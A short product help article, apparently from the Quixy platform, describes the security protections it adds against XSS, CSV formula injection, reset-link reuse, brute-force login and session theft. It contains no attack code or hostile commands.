Vulnerability Assessment and Penetration Testing (VAPT) is a critical part of ensuring the security of any software application. In Quixy, we have implemented specific measures to address security breaches.
In this article, we will discuss the security limitations in Quixy platform and how we have handled them.
Cross-Site Scripting (XSS)
One of the most common security limitations in web applications is Cross-Site Scripting (XSS). Users can inject vulnerable scripts that compromise the platform's security through the Rich Text Editor (RTE). To prevent this, we have implemented a white-list approach where only certain HTML tags can enter the RTE. See the list...
CSV/Excel Upload
Another standard security limitation in web applications is related to file uploads and downloads. Attackers can inject vulnerable scripts to steal server or user information through CSV files. To prevent this, we have restricted formulas in file uploads (such as Excel Files) and downloads.
Reset Password Link
Reset password links can also be exploited by attackers to gain unauthorized access to the platform. This link is only valid for a limited time to prevent reuse by attackers. Once used or expired, the link will no longer be valid. This ensures that only the authorized user can access their account and change their password.
Brute Force Attack
Brute force attacks are another standard security limitation where attackers attempt to gain access to the platform by guessing user credentials. To prevent this, we have implemented a blocking mechanism where the user will be blocked after three unsuccessful login attempts.
Session Timeout
Session timeout is a best practice for security concerns. Attackers can steal cookies from the browser to gain unauthorized access to the platform. To prevent this, we have implemented a session timeout where the user will be logged out after a certain amount of idle time.